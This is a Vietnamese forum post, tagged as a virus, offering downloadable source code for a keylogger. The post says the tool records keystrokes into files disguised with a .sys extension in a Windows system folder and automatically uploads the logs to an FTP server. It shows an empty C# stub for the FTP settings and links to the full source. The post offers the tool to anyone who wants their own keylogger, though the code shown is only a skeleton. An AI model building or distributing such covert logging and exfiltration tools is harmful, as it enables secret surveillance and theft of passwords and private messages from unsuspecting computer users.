Trao đổi với tôi

www.hdphim.info

11/27/09

[Virus] Chương trình Key Logger

Chương trình Key Logger

Post Thanh Tú 19-08-2009, 11:39

Cái này hồi đó được viết để quản lý máy tính của mình :ym_happy: Source này rất thích hợp cho những ai muốn tự làm Key Logger riêng cho mình.
Nhiệm vụ của nó như sau:
+ Ghi nhận quá trình hoạt động của bàn phím, ghi lại vào file.
+ Cho phép viewe lại log khi cần thiết.
+ Trong quá trình ghi nhận, tự động đưa các file log lên FTP server được chỉ định.

Khi chạy, nó sẽ ghi các file log vào thư mục C:\WINDOWS\win32t, tên file log sẽ là Tên user + ngày giờ. Đuôi mở rộng sẽ là .sys
Để view lại log, đi kèm có thêm Viewer để xem lại các log.
Hình ảnh này đã được thu nhỏ. Click vào đây để xem hình gốc. Kích thước của hình gốc là 799x437.
Hình ảnh

Để chương trình tự động tải các file log lên FTP server thì tùy chỉnh lại thông tin này trong source:
Code: Chọn hết
private string host = "";
private string user = "";
private string pass = "";
private string preFilePath = "";
private void uploadFile(string FTPAddress, string filePath, string username, string password)
{
//........
}

Download source:

http://files.kythuatvien.com/file/525777996.ktv